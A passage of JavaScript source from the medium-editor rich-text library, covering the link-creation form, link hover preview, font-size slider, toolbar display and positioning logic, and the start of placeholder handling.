// bail if span is in contenteditable = false
if (Util.traverseUp(el, isCEF)) {
return false;
}
// remove empty spans, replace others with their contents
Util.unwrap(el, this.document);
}
}
});
}());
var AnchorExtension;
(function () {
'use strict';
function AnchorDerived() {
this.parent = true;
this.options = {
name: 'anchor',
action: 'createLink',
aria: 'link',
tagNames: ['a'],
contentDefault: '<b>#</b>',
contentFA: '<i class="fa fa-link"></i>'
};
this.name = 'anchor';
this.hasForm = true;
}
AnchorDerived.prototype = {
// Button and Extension handling
// labels for the anchor-edit form buttons
formSaveLabel: '✓',
formCloseLabel: '×',
// Called when the button in the toolbar is clicked
// Overrides DefaultButton.handleClick
handleClick: function (evt) {
evt.preventDefault();
evt.stopPropagation();
var selectedParentElement = Selection.getSelectedParentElement(Util.getSelectionRange(this.base.options.ownerDocument));
if (selectedParentElement.tagName &&
selectedParentElement.tagName.toLowerCase() === 'a') {
return this.base.execAction('unlink');
}
if (!this.isDisplayed()) {
this.showForm();
}
return false;
},
// Called by medium-editor to append form to the toolbar
getForm: function () {
if (!this.form) {
this.form = this.createForm();
}
return this.form;
},
getTemplate: function () {
var template = [
'<input type="text" class="medium-editor-toolbar-input" placeholder="', this.base.options.anchorInputPlaceholder, '">'
];
template.push(
'<a href="#" class="medium-editor-toolbar-save">',
this.base.options.buttonLabels === 'fontawesome' ? '<i class="fa fa-check"></i>' : this.formSaveLabel,
'</a>'
);
template.push('<a href="#" class="medium-editor-toolbar-close">',
this.base.options.buttonLabels === 'fontawesome' ? '<i class="fa fa-times"></i>' : this.formCloseLabel,
'</a>');
// both of these options are slightly moot with the ability to
// override the various form buildup/serialize functions.
if (this.base.options.anchorTarget) {
// fixme: ideally, this options.anchorInputCheckboxLabel would be a formLabel too,
// figure out how to deprecate? also consider `fa-` icon default implications.
template.push(
'<input type="checkbox" class="medium-editor-toolbar-anchor-target">',
'<label>',
this.base.options.anchorInputCheckboxLabel,
'</label>'
);
}
if (this.base.options.anchorButton) {
// fixme: expose this `Button` text as a formLabel property, too
// and provide similar access to a `fa-` icon default.
template.push(
'<input type="checkbox" class="medium-editor-toolbar-anchor-button">',
'<label>Button</label>'
);
}
return template.join('');
},
// Used by medium-editor when the default toolbar is to be displayed
isDisplayed: function () {
return this.getForm().style.display === 'block';
},
hideForm: function () {
this.getForm().style.display = 'none';
this.getInput().value = '';
},
showForm: function (linkValue) {
var input = this.getInput();
this.base.saveSelection();
this.base.hideToolbarDefaultActions();
this.getForm().style.display = 'block';
this.base.setToolbarPosition();
input.value = linkValue || '';
input.focus();
},
// Called by core when tearing down medium-editor (deactivate)
deactivate: function () {
if (!this.form) {
return false;
}
if (this.form.parentNode) {
this.form.parentNode.removeChild(this.form);
}
delete this.form;
},
// core methods
getFormOpts: function () {
// no notion of private functions? wanted `_getFormOpts`
var targetCheckbox = this.getForm().querySelector('.medium-editor-toolbar-anchor-target'),
buttonCheckbox = this.getForm().querySelector('.medium-editor-toolbar-anchor-button'),
opts = {
url: this.getInput().value
};
if (this.base.options.checkLinkFormat) {
opts.url = this.checkLinkFormat(opts.url);
}
if (targetCheckbox && targetCheckbox.checked) {
opts.target = '_blank';
} else {
opts.target = '_self';
}
if (buttonCheckbox && buttonCheckbox.checked) {
opts.buttonClass = this.base.options.anchorButtonClass;
}
return opts;
},
doFormSave: function () {
var opts = this.getFormOpts();
this.completeFormSave(opts);
},
completeFormSave: function (opts) {
this.base.restoreSelection();
this.base.createLink(opts);
this.base.checkSelection();
},
checkLinkFormat: function (value) {
var re = /^(https?|ftps?|rtmpt?):\/\/|mailto:/;
return (re.test(value) ? '' : 'http://') + value;
},
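// Illustrative: checkLinkFormat('example.com') returns 'http://example.com',
// while values that already match the scheme regex, such as
// 'https://example.com' or 'mailto:user@example.com', pass through unchanged.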
doFormCancel: function () {
this.base.restoreSelection();
this.base.checkSelection();
},
// form creation and event handling
attachFormEvents: function (form) {
var close = form.querySelector('.medium-editor-toolbar-close'),
save = form.querySelector('.medium-editor-toolbar-save'),
input = form.querySelector('.medium-editor-toolbar-input');
// Handle clicks on the form itself
this.base.on(form, 'click', this.handleFormClick.bind(this));
// Handle typing in the textbox
this.base.on(input, 'keyup', this.handleTextboxKeyup.bind(this));
// Handle close button clicks
this.base.on(close, 'click', this.handleCloseClick.bind(this));
// Handle save button clicks (capture)
this.base.on(save, 'click', this.handleSaveClick.bind(this), true);
},
createForm: function () {
var doc = this.base.options.ownerDocument,
form = doc.createElement('div');
// Anchor Form (div)
form.className = 'medium-editor-toolbar-form';
form.id = 'medium-editor-toolbar-form-anchor-' + this.base.id;
form.innerHTML = this.getTemplate();
this.attachFormEvents(form);
return form;
},
getInput: function () {
return this.getForm().querySelector('input.medium-editor-toolbar-input');
},
handleTextboxKeyup: function (event) {
// For ENTER -> create the anchor
if (event.keyCode === Util.keyCode.ENTER) {
event.preventDefault();
this.doFormSave();
return;
}
// For ESCAPE -> close the form
if (event.keyCode === Util.keyCode.ESCAPE) {
event.preventDefault();
this.doFormCancel();
}
},
handleFormClick: function (event) {
// make sure not to hide form when clicking inside the form
event.stopPropagation();
},
handleSaveClick: function (event) {
// Clicking Save -> create the anchor
event.preventDefault();
this.doFormSave();
},
handleCloseClick: function (event) {
// Click Close -> close the form
event.preventDefault();
this.doFormCancel();
}
};
AnchorExtension = Util.derives(DefaultButton, AnchorDerived);
}());
var AnchorPreview;
(function () {
'use strict';
AnchorPreview = function () {
this.parent = true;
this.name = 'anchor-preview';
};
AnchorPreview.prototype = {
// the default selector to locate where to
// put the activeAnchor value in the preview
previewValueSelector: 'a',
init: function (instance) {
this.base = instance;
this.anchorPreview = this.createPreview();
this.base.options.elementsContainer.appendChild(this.anchorPreview);
this.attachToEditables();
},
getPreviewElement: function () {
return this.anchorPreview;
},
createPreview: function () {
var el = this.base.options.ownerDocument.createElement('div');
el.id = 'medium-editor-anchor-preview-' + this.base.id;
el.className = 'medium-editor-anchor-preview';
el.innerHTML = this.getTemplate();
this.base.on(el, 'click', this.handleClick.bind(this));
return el;
},
getTemplate: function () {
return '<div class="medium-editor-toolbar-anchor-preview" id="medium-editor-toolbar-anchor-preview">' +
' <a class="medium-editor-toolbar-anchor-preview-inner"></a>' +
'</div>';
},
deactivate: function () {
if (this.anchorPreview) {
if (this.anchorPreview.parentNode) {
this.anchorPreview.parentNode.removeChild(this.anchorPreview);
}
delete this.anchorPreview;
}
},
hidePreview: function () {
this.anchorPreview.classList.remove('medium-editor-anchor-preview-active');
this.activeAnchor = null;
},
showPreview: function (anchorEl) {
if (this.anchorPreview.classList.contains('medium-editor-anchor-preview-active') ||
anchorEl.getAttribute('data-disable-preview')) {
return true;
}
if (this.previewValueSelector) {
this.anchorPreview.querySelector(this.previewValueSelector).textContent = anchorEl.attributes.href.value;
this.anchorPreview.querySelector(this.previewValueSelector).href = anchorEl.attributes.href.value;
}
this.anchorPreview.classList.add('medium-toolbar-arrow-over');
this.anchorPreview.classList.remove('medium-toolbar-arrow-under');
if (!this.anchorPreview.classList.contains('medium-editor-anchor-preview-active')) {
this.anchorPreview.classList.add('medium-editor-anchor-preview-active');
}
this.activeAnchor = anchorEl;
this.positionPreview();
this.attachPreviewHandlers();
return this;
},
positionPreview: function () {
var buttonHeight = 40,
boundary = this.activeAnchor.getBoundingClientRect(),
middleBoundary = (boundary.left + boundary.right) / 2,
halfOffsetWidth,
defaultLeft;
halfOffsetWidth = this.anchorPreview.offsetWidth / 2;
defaultLeft = this.base.options.diffLeft - halfOffsetWidth;
this.anchorPreview.style.top = Math.round(buttonHeight + boundary.bottom - this.base.options.diffTop + this.base.options.contentWindow.pageYOffset - this.anchorPreview.offsetHeight) + 'px';
if (middleBoundary < halfOffsetWidth) {
this.anchorPreview.style.left = defaultLeft + halfOffsetWidth + 'px';
} else if ((this.base.options.contentWindow.innerWidth - middleBoundary) < halfOffsetWidth) {
this.anchorPreview.style.left = this.base.options.contentWindow.innerWidth + defaultLeft - halfOffsetWidth + 'px';
} else {
this.anchorPreview.style.left = defaultLeft + middleBoundary + 'px';
}
},
attachToEditables: function () {
this.base.subscribe('editableMouseover', this.handleEditableMouseover.bind(this));
},
handleClick: function (event) {
var anchorExtension = this.base.getExtensionByName('anchor'),
activeAnchor = this.activeAnchor;
if (anchorExtension && activeAnchor) {
event.preventDefault();
this.base.selectElement(this.activeAnchor);
// Using setTimeout + options.delay because:
// We may actually be displaying the anchor form, which should be controlled by options.delay
this.base.delay(function () {
if (activeAnchor) {
anchorExtension.showForm(activeAnchor.attributes.href.value);
activeAnchor = null;
}
}.bind(this));
}
this.hidePreview();
},
handleAnchorMouseout: function () {
this.anchorToPreview = null;
this.base.off(this.activeAnchor, 'mouseout', this.instanceHandleAnchorMouseout);
this.instanceHandleAnchorMouseout = null;
},
handleEditableMouseover: function (event) {
var target = Util.getClosestTag(event.target, 'a');
if (target) {
// Detect empty href attributes
// The browser will make href="" or href="#top"
// into absolute urls when accessed as event.target.href, so check the html
if (!/href=["']\S+["']/.test(target.outerHTML) || /href=["']#\S+["']/.test(target.outerHTML)) {
return true;
}
// only show when hovering on anchors
if (this.base.toolbar && this.base.toolbar.isDisplayed()) {
// only show when toolbar is not present
return true;
}
// detach handler for other anchor in case we hovered multiple anchors quickly
if (this.activeAnchor && this.activeAnchor !== target) {
this.detachPreviewHandlers();
}
this.anchorToPreview = target;
this.instanceHandleAnchorMouseout = this.handleAnchorMouseout.bind(this);
this.base.on(this.anchorToPreview, 'mouseout', this.instanceHandleAnchorMouseout);
// Using setTimeout + options.delay because:
// - We're going to show the anchor preview according to the configured delay
// if the mouse has not left the anchor tag in that time
this.base.delay(function () {
if (this.anchorToPreview) {
//this.activeAnchor = this.anchorToPreview;
this.showPreview(this.anchorToPreview);
}
}.bind(this));
}
},
handlePreviewMouseover: function () {
this.lastOver = (new Date()).getTime();
this.hovering = true;
},
handlePreviewMouseout: function (event) {
if (!event.relatedTarget || !/anchor-preview/.test(event.relatedTarget.className)) {
this.hovering = false;
}
},
updatePreview: function () {
if (this.hovering) {
return true;
}
var durr = (new Date()).getTime() - this.lastOver;
if (durr > this.base.options.anchorPreviewHideDelay) {
// hide the preview once the mouse has been off the link longer than anchorPreviewHideDelay
this.detachPreviewHandlers();
}
},
detachPreviewHandlers: function () {
// cleanup
clearInterval(this.intervalTimer);
if (this.instanceHandlePreviewMouseover) {
this.base.off(this.anchorPreview, 'mouseover', this.instanceHandlePreviewMouseover);
this.base.off(this.anchorPreview, 'mouseout', this.instanceHandlePreviewMouseout);
if (this.activeAnchor) {
this.base.off(this.activeAnchor, 'mouseover', this.instanceHandlePreviewMouseover);
this.base.off(this.activeAnchor, 'mouseout', this.instanceHandlePreviewMouseout);
}
}
this.hidePreview();
this.hovering = this.instanceHandlePreviewMouseover = this.instanceHandlePreviewMouseout = null;
},
// TODO: break up method and extract out handlers
attachPreviewHandlers: function () {
this.lastOver = (new Date()).getTime();
this.hovering = true;
this.instanceHandlePreviewMouseover = this.handlePreviewMouseover.bind(this);
this.instanceHandlePreviewMouseout = this.handlePreviewMouseout.bind(this);
this.intervalTimer = setInterval(this.updatePreview.bind(this), 200);
this.base.on(this.anchorPreview, 'mouseover', this.instanceHandlePreviewMouseover);
this.base.on(this.anchorPreview, 'mouseout', this.instanceHandlePreviewMouseout);
this.base.on(this.activeAnchor, 'mouseover', this.instanceHandlePreviewMouseover);
this.base.on(this.activeAnchor, 'mouseout', this.instanceHandlePreviewMouseout);
}
};
}());
var FontSizeExtension;
(function () {
'use strict';
function FontSizeDerived() {
this.parent = true;
this.options = {
name: 'fontsize',
action: 'fontSize',
aria: 'increase/decrease font size',
contentDefault: '±', // ±
contentFA: '<i class="fa fa-text-height"></i>'
};
this.name = 'fontsize';
this.hasForm = true;
}
FontSizeDerived.prototype = {
// Button and Extension handling
// Called when the button in the toolbar is clicked
// Overrides DefaultButton.handleClick
handleClick: function (evt) {
evt.preventDefault();
evt.stopPropagation();
if (!this.isDisplayed()) {
// Get fontsize of current selection (convert to string since IE returns this as number)
var fontSize = this.base.options.ownerDocument.queryCommandValue('fontSize') + '';
this.showForm(fontSize);
}
return false;
},
// Called by medium-editor to append form to the toolbar
getForm: function () {
if (!this.form) {
this.form = this.createForm();
}
return this.form;
},
// Used by medium-editor when the default toolbar is to be displayed
isDisplayed: function () {
return this.getForm().style.display === 'block';
},
hideForm: function () {
this.getForm().style.display = 'none';
this.getInput().value = '';
},
showForm: function (fontSize) {
var input = this.getInput();
this.base.saveSelection();
this.base.hideToolbarDefaultActions();
this.getForm().style.display = 'block';
this.base.setToolbarPosition();
input.value = fontSize || '';
input.focus();
},
// Called by core when tearing down medium-editor (deactivate)
deactivate: function () {
if (!this.form) {
return false;
}
if (this.form.parentNode) {
this.form.parentNode.removeChild(this.form);
}
delete this.form;
},
// core methods
doFormSave: function () {
this.base.restoreSelection();
this.base.checkSelection();
},
doFormCancel: function () {
this.base.restoreSelection();
this.clearFontSize();
this.base.checkSelection();
},
// form creation and event handling
createForm: function () {
var doc = this.base.options.ownerDocument,
form = doc.createElement('div'),
input = doc.createElement('input'),
close = doc.createElement('a'),
save = doc.createElement('a');
// Font Size Form (div)
form.className = 'medium-editor-toolbar-form';
form.id = 'medium-editor-toolbar-form-fontsize-' + this.base.id;
// Handle clicks on the form itself
this.base.on(form, 'click', this.handleFormClick.bind(this));
// Add font size slider
input.setAttribute('type', 'range');
input.setAttribute('min', '1');
input.setAttribute('max', '7');
input.className = 'medium-editor-toolbar-input';
form.appendChild(input);
// Handle typing in the textbox
this.base.on(input, 'change', this.handleSliderChange.bind(this));
// Add save button
save.setAttribute('href', '#');
save.className = 'medium-editor-toobar-save';
save.innerHTML = this.base.options.buttonLabels === 'fontawesome' ?
'<i class="fa fa-check"></i>' :
'✓';
form.appendChild(save);
// Handle save button clicks (capture)
this.base.on(save, 'click', this.handleSaveClick.bind(this), true);
// Add close button
close.setAttribute('href', '#');
close.className = 'medium-editor-toobar-close';
close.innerHTML = this.base.options.buttonLabels === 'fontawesome' ?
'<i class="fa fa-times"></i>' :
'×';
form.appendChild(close);
// Handle close button clicks
this.base.on(close, 'click', this.handleCloseClick.bind(this));
return form;
},
getInput: function () {
return this.getForm().querySelector('input.medium-editor-toolbar-input');
},
clearFontSize: function () {
Selection.getSelectedElements(this.base.options.ownerDocument).forEach(function (el) {
if (el.tagName === 'FONT' && el.hasAttribute('size')) {
el.removeAttribute('size');
}
});
},
handleSliderChange: function () {
var size = this.getInput().value;
if (size === '4') {
this.clearFontSize();
} else {
this.base.execAction('fontSize', { size: size });
}
},
handleFormClick: function (event) {
// make sure not to hide form when clicking inside the form
event.stopPropagation();
},
handleSaveClick: function (event) {
// Clicking Save -> apply the font size
event.preventDefault();
this.doFormSave();
},
handleCloseClick: function (event) {
// Click Close -> close the form
event.preventDefault();
this.doFormCancel();
}
};
FontSizeExtension = Util.derives(DefaultButton, FontSizeDerived);
}());
var Toolbar;
(function () {
'use strict';
Toolbar = function Toolbar(instance) {
this.base = instance;
this.options = instance.options;
this.initThrottledMethods();
};
Toolbar.prototype = {
// Toolbar creation/deletion
createToolbar: function () {
var toolbar = this.base.options.ownerDocument.createElement('div');
toolbar.id = 'medium-editor-toolbar-' + this.base.id;
toolbar.className = 'medium-editor-toolbar';
if (this.options.staticToolbar) {
toolbar.className += ' static-toolbar';
} else {
toolbar.className += ' stalker-toolbar';
}
toolbar.appendChild(this.createToolbarButtons());
// Add any forms that extensions may have
this.base.commands.forEach(function (extension) {
if (extension.hasForm) {
toolbar.appendChild(extension.getForm());
}
});
this.attachEventHandlers();
return toolbar;
},
createToolbarButtons: function () {
var ul = this.base.options.ownerDocument.createElement('ul'),
li,
btn,
buttons,
extension;
ul.id = 'medium-editor-toolbar-actions' + this.base.id;
ul.className = 'medium-editor-toolbar-actions clearfix';
ul.style.display = 'block';
this.base.options.buttons.forEach(function (button) {
extension = this.base.getExtensionByName(button);
if (typeof extension.getButton === 'function') {
btn = extension.getButton(this.base);
li = this.base.options.ownerDocument.createElement('li');
if (Util.isElement(btn)) {
li.appendChild(btn);
} else {
li.innerHTML = btn;
}
ul.appendChild(li);
}
}.bind(this));
buttons = ul.querySelectorAll('button');
if (buttons.length > 0) {
buttons[0].classList.add(this.options.firstButtonClass);
buttons[buttons.length - 1].classList.add(this.options.lastButtonClass);
}
return ul;
},
deactivate: function () {
if (this.toolbar) {
if (this.toolbar.parentNode) {
this.toolbar.parentNode.removeChild(this.toolbar);
}
delete this.toolbar;
}
},
// Toolbar accessors
getToolbarElement: function () {
if (!this.toolbar) {
this.toolbar = this.createToolbar();
}
return this.toolbar;
},
getToolbarActionsElement: function () {
return this.getToolbarElement().querySelector('.medium-editor-toolbar-actions');
},
// Toolbar event handlers
initThrottledMethods: function () {
// throttledPositionToolbar is throttled because:
// - It will be called when the browser is resizing, which can fire many times very quickly
// - For some events (like resize) a slight lag in UI responsiveness is OK and provides performance benefits
this.throttledPositionToolbar = Util.throttle(function () {
if (this.base.isActive) {
this.positionToolbarIfShown();
}
}.bind(this));
},
attachEventHandlers: function () {
// MediumEditor custom events for when user begins and ends interaction with a contenteditable and its elements
this.base.subscribe('blur', this.handleBlur.bind(this));
this.base.subscribe('focus', this.handleFocus.bind(this));
// Updating the state of the toolbar as things change
this.base.subscribe('editableClick', this.handleEditableClick.bind(this));
this.base.subscribe('editableKeyup', this.handleEditableKeyup.bind(this));
// Handle mouseup on document for updating the selection in the toolbar
this.base.on(this.options.ownerDocument.documentElement, 'mouseup', this.handleDocumentMouseup.bind(this));
// Add a scroll event for sticky toolbar
if (this.options.staticToolbar && this.options.stickyToolbar) {
// On scroll (capture), re-position the toolbar
this.base.on(this.options.contentWindow, 'scroll', this.handleWindowScroll.bind(this), true);
}
// On resize, re-position the toolbar
this.base.on(this.options.contentWindow, 'resize', this.handleWindowResize.bind(this));
},
handleWindowScroll: function () {
this.positionToolbarIfShown();
},
handleWindowResize: function () {
this.throttledPositionToolbar();
},
handleDocumentMouseup: function (event) {
// Do not trigger checkState when mouseup fires over the toolbar
if (event &&
event.target &&
Util.isDescendant(this.getToolbarElement(), event.target)) {
return false;
}
this.checkState();
},
handleEditableClick: function () {
// Delay the call to checkState to handle bug where selection is empty
// immediately after clicking inside a pre-existing selection
setTimeout(function () {
this.checkState();
}.bind(this), 0);
},
handleEditableKeyup: function () {
this.checkState();
},
handleBlur: function () {
// Kill any previously delayed calls to hide the toolbar
clearTimeout(this.hideTimeout);
// Blur may fire even if we have a selection, so we want to prevent any delayed showToolbar
// calls from happening in this specific case
clearTimeout(this.delayShowTimeout);
// Delay the call to hideToolbar to handle bug with multiple editors on the page at once
this.hideTimeout = setTimeout(function () {
this.hideToolbar();
}.bind(this), 1);
},
handleFocus: function () {
this.checkState();
},
// Hiding/showing toolbar
isDisplayed: function () {
return this.getToolbarElement().classList.contains('medium-editor-toolbar-active');
},
showToolbar: function () {
clearTimeout(this.hideTimeout);
if (!this.isDisplayed()) {
this.getToolbarElement().classList.add('medium-editor-toolbar-active');
if (typeof this.options.onShowToolbar === 'function') {
this.options.onShowToolbar();
}
}
},
hideToolbar: function () {
if (this.isDisplayed()) {
this.base.commands.forEach(function (extension) {
if (typeof extension.onHide === 'function') {
extension.onHide();
}
});
this.getToolbarElement().classList.remove('medium-editor-toolbar-active');
if (typeof this.options.onHideToolbar === 'function') {
this.options.onHideToolbar();
}
}
},
isToolbarDefaultActionsDisplayed: function () {
return this.getToolbarActionsElement().style.display === 'block';
},
hideToolbarDefaultActions: function () {
if (this.isToolbarDefaultActionsDisplayed()) {
this.getToolbarActionsElement().style.display = 'none';
}
},
showToolbarDefaultActions: function () {
this.hideExtensionForms();
if (!this.isToolbarDefaultActionsDisplayed()) {
this.getToolbarActionsElement().style.display = 'block';
}
// Using setTimeout + options.delay because:
// We will actually be displaying the toolbar, which should be controlled by options.delay
this.delayShowTimeout = this.base.delay(function () {
this.showToolbar();
}.bind(this));
},
hideExtensionForms: function () {
// Hide all extension forms
this.base.commands.forEach(function (extension) {
if (extension.hasForm && extension.isDisplayed()) {
extension.hideForm();
}
});
},
// Responding to changes in user selection
// Checks for existence of multiple block elements in the current selection
multipleBlockElementsSelected: function () {
/*jslint regexp: true*/
var selectionHtml = Selection.getSelectionHtml.call(this).replace(/<[\S]+><\/[\S]+>/gim, ''),
hasMultiParagraphs = selectionHtml.match(/<(p|h[1-6]|blockquote)[^>]*>/g);
/*jslint regexp: false*/
return !!hasMultiParagraphs && hasMultiParagraphs.length > 1;
},
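// Illustrative: a selection whose html is '<p>one</p><p>two</p>' produces two
// block-tag matches, so this returns true; empty open/close pairs like
// '<p></p>' are stripped first so they don't count.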
modifySelection: function () {
var selection = this.options.contentWindow.getSelection(),
selectionRange = selection.getRangeAt(0);
/*
* In firefox, there are cases (ie doubleclick of a word) where the selectionRange start
* will be at the very end of an element. In other browsers, the selectionRange start
* would instead be at the very beginning of an element that actually has content.
* example:
* <span>foo</span><span>bar</span>
*
* If the text 'bar' is selected, most browsers will have the selectionRange start at the beginning
* of the 'bar' span. However, there are cases where firefox will have the selectionRange start
* at the end of the 'foo' span. The contenteditable behavior will be ok, but if there are any
* properties on the 'bar' span, they won't be reflected accurately in the toolbar
* (ie 'Bold' button wouldn't be active)
*
* So, for cases where the selectionRange start is at the end of an element/node, find the next
* adjacent text node that actually has content in it, and move the selectionRange start there.
*/
if (this.options.standardizeSelectionStart &&
selectionRange.startContainer.nodeValue &&
(selectionRange.startOffset === selectionRange.startContainer.nodeValue.length)) {
var adjacentNode = Util.findAdjacentTextNodeWithContent(Selection.getSelectionElement(this.options.contentWindow), selectionRange.startContainer, this.options.ownerDocument);
if (adjacentNode) {
var offset = 0;
while (adjacentNode.nodeValue.substr(offset, 1).trim().length === 0) {
offset = offset + 1;
}
var newRange = this.options.ownerDocument.createRange();
newRange.setStart(adjacentNode, offset);
newRange.setEnd(selectionRange.endContainer, selectionRange.endOffset);
selection.removeAllRanges();
selection.addRange(newRange);
selectionRange = newRange;
}
}
},
checkState: function () {
if (!this.base.preventSelectionUpdates) {
// If no editable has focus OR selection is inside contenteditable = false
// hide toolbar
if (!this.getFocusedElement() ||
Selection.selectionInContentEditableFalse(this.options.contentWindow)) {
this.hideToolbar();
return;
}
// If there's no selection element, selection element doesn't belong to this editor
// or toolbar is disabled for this selection element
// hide toolbar
var selectionElement = Selection.getSelectionElement(this.options.contentWindow);
if (!selectionElement ||
this.base.elements.indexOf(selectionElement) === -1 ||
selectionElement.getAttribute('data-disable-toolbar')) {
this.hideToolbar();
return;
}
// Now we know there's a focused editable with a selection
// If the updateOnEmptySelection option is true, show the toolbar
if (this.options.updateOnEmptySelection && this.options.staticToolbar) {
this.showAndUpdateToolbar();
return;
}
// If we don't have a 'valid' selection -> hide toolbar
if (this.options.contentWindow.getSelection().toString().trim() === '' ||
(this.options.allowMultiParagraphSelection === false && this.multipleBlockElementsSelected())) {
this.hideToolbar();
} else {
this.showAndUpdateToolbar();
}
}
},
getFocusedElement: function () {
for (var i = 0; i < this.base.elements.length; i += 1) {
if (this.base.elements[i].getAttribute('data-medium-focused')) {
return this.base.elements[i];
}
}
return null;
},
// Updating the toolbar
showAndUpdateToolbar: function () {
this.modifySelection();
this.setToolbarButtonStates();
this.showToolbarDefaultActions();
this.setToolbarPosition();
},
setToolbarButtonStates: function () {
this.base.commands.forEach(function (extension) {
if (typeof extension.isActive === 'function' &&
typeof extension.setInactive === 'function') {
extension.setInactive();
}
}.bind(this));
this.checkActiveButtons();
},
checkActiveButtons: function () {
var manualStateChecks = [],
queryState = null,
selectionRange = Util.getSelectionRange(this.options.ownerDocument),
parentNode,
updateExtensionState = function (extension) {
if (typeof extension.checkState === 'function') {
extension.checkState(parentNode);
} else if (typeof extension.isActive === 'function' &&
typeof extension.isAlreadyApplied === 'function' &&
typeof extension.setActive === 'function') {
if (!extension.isActive() && extension.isAlreadyApplied(parentNode)) {
extension.setActive();
}
}
};
if (!selectionRange) {
return;
}
parentNode = Selection.getSelectedParentElement(selectionRange);
// Loop through all commands
this.base.commands.forEach(function (command) {
// For those commands where we can use document.queryCommandState(), do so
if (typeof command.queryCommandState === 'function') {
queryState = command.queryCommandState();
// If queryCommandState returns a valid value, we can trust the browser
// and don't need to do our manual checks
if (queryState !== null) {
if (queryState && typeof command.setActive === 'function') {
command.setActive();
}
return;
}
}
// We can't use queryCommandState for this command, so add to manualStateChecks
manualStateChecks.push(command);
});
// Climb up the DOM and do manual checks for whether a certain command is currently enabled for this node
while (parentNode.tagName !== undefined && Util.parentElements.indexOf(parentNode.tagName.toLowerCase()) === -1) {
manualStateChecks.forEach(updateExtensionState);
// we can abort the search upwards if we leave the contentEditable element
if (this.base.elements.indexOf(parentNode) !== -1) {
break;
}
parentNode = parentNode.parentNode;
}
},
// Positioning toolbar
positionToolbarIfShown: function () {
if (this.isDisplayed()) {
this.setToolbarPosition();
}
},
setToolbarPosition: function () {
var container = this.getFocusedElement(),
selection = this.options.contentWindow.getSelection(),
anchorPreview;
// If there isn't a valid selection, bail
if (!container) {
return this;
}
if (this.options.staticToolbar) {
this.showToolbar();
this.positionStaticToolbar(container);
} else if (!selection.isCollapsed) {
this.showToolbar();
this.positionToolbar(selection);
}
anchorPreview = this.base.getExtensionByName('anchor-preview');
if (anchorPreview && typeof anchorPreview.hidePreview === 'function') {
anchorPreview.hidePreview();
}
},
positionStaticToolbar: function (container) {
// position the toolbar at left 0, so we can get the real width of the toolbar
this.getToolbarElement().style.left = '0';
// document.documentElement for IE 9
var scrollTop = (this.options.ownerDocument.documentElement && this.options.ownerDocument.documentElement.scrollTop) || this.options.ownerDocument.body.scrollTop,
windowWidth = this.options.contentWindow.innerWidth,
toolbarElement = this.getToolbarElement(),
containerRect = container.getBoundingClientRect(),
containerTop = containerRect.top + scrollTop,
containerCenter = (containerRect.left + (containerRect.width / 2)),
toolbarHeight = toolbarElement.offsetHeight,
toolbarWidth = toolbarElement.offsetWidth,
halfOffsetWidth = toolbarWidth / 2,
targetLeft;
if (this.options.stickyToolbar) {
// If it's beyond the height of the editor, position it at the bottom of the editor
if (scrollTop > (containerTop + container.offsetHeight - toolbarHeight)) {
toolbarElement.style.top = (containerTop + container.offsetHeight - toolbarHeight) + 'px';
toolbarElement.classList.remove('sticky-toolbar');
// Stick the toolbar to the top of the window
} else if (scrollTop > (containerTop - toolbarHeight)) {
toolbarElement.classList.add('sticky-toolbar');
toolbarElement.style.top = '0px';
// Normal static toolbar position
} else {
toolbarElement.classList.remove('sticky-toolbar');
toolbarElement.style.top = containerTop - toolbarHeight + 'px';
}
} else {
toolbarElement.style.top = containerTop - toolbarHeight + 'px';
}
if (this.options.toolbarAlign === 'left') {
targetLeft = containerRect.left;
} else if (this.options.toolbarAlign === 'center') {
targetLeft = containerCenter - halfOffsetWidth;
} else if (this.options.toolbarAlign === 'right') {
targetLeft = containerRect.right - toolbarWidth;
}
if (targetLeft < 0) {
targetLeft = 0;
} else if ((targetLeft + toolbarWidth) > windowWidth) {
targetLeft = (windowWidth - Math.ceil(toolbarWidth) - 1);
}
toolbarElement.style.left = targetLeft + 'px';
},
positionToolbar: function (selection) {
// position the toolbar at left 0, so we can get the real width of the toolbar
this.getToolbarElement().style.left = '0';
var windowWidth = this.options.contentWindow.innerWidth,
range = selection.getRangeAt(0),
boundary = range.getBoundingClientRect(),
middleBoundary = (boundary.left + boundary.right) / 2,
toolbarElement = this.getToolbarElement(),
toolbarHeight = toolbarElement.offsetHeight,
toolbarWidth = toolbarElement.offsetWidth,
halfOffsetWidth = toolbarWidth / 2,
buttonHeight = 50,
defaultLeft = this.options.diffLeft - halfOffsetWidth;
if (boundary.top < buttonHeight) {
toolbarElement.classList.add('medium-toolbar-arrow-over');
toolbarElement.classList.remove('medium-toolbar-arrow-under');
toolbarElement.style.top = buttonHeight + boundary.bottom - this.options.diffTop + this.options.contentWindow.pageYOffset - toolbarHeight + 'px';
} else {
toolbarElement.classList.add('medium-toolbar-arrow-under');
toolbarElement.classList.remove('medium-toolbar-arrow-over');
toolbarElement.style.top = boundary.top + this.options.diffTop + this.options.contentWindow.pageYOffset - toolbarHeight + 'px';
}
if (middleBoundary < halfOffsetWidth) {
toolbarElement.style.left = defaultLeft + halfOffsetWidth + 'px';
} else if ((windowWidth - middleBoundary) < halfOffsetWidth) {
toolbarElement.style.left = windowWidth + defaultLeft - halfOffsetWidth + 'px';
} else {
toolbarElement.style.left = defaultLeft + middleBoundary + 'px';
}
}
};
}());
var Placeholders;
(function () {
'use strict';
Placeholders = function (instance) {
this.base = instance;
this.initPlaceholders();
this.attachEventHandlers();
};
Placeholders.prototype = {
initPlaceholders: function () {
this.base.elements.forEach(function (el) {
this.updatePlaceholder(el);
}, this);
},
showPlaceholder: function (el) {
if (el) {
el.classList.add('medium-editor-placeholder');
}
},
hidePlaceholder: function (el) {
if (el) {
el.classList.remove('medium-editor-placeholder');
}
},
updatePlaceholder: function (el) {
if (!(el.querySelector('img')) &&
!(el.querySelector('blockquote')) &&
el.textContent.replace(/^\s+|\s+$/g, '') === '') {
this.showPlaceholder(el);
} else {
this.hidePlaceholder(el);
}
},
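// Illustrative: an editable whose content is only whitespace (and contains no
// <img> or <blockquote>) gets the 'medium-editor-placeholder' class; once any
// visible character is present the class is removed on the next update.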
attachEventHandlers: function () {
// Custom events
this.base.subscribe('blur', this.handleExternalInteraction.bind(this));
// Check placeholder on blur
this.base.subscribe('editableBlur', this.handleBlur.bind(this));
// Events where we always hide the placeholder
this.base.subscribe('editableClick', this.handleHidePlaceholderEvent.bind(this));
this.base.subscribe('editableKeypress', this.handleHidePlaceholderEvent.bind(this));
this.base.subscribe('editablePaste', this.handleHidePlaceholderEvent.bind(this));
},
handleHidePlaceholderEvent: function (event, element) {
// Events where we hide the placeholder
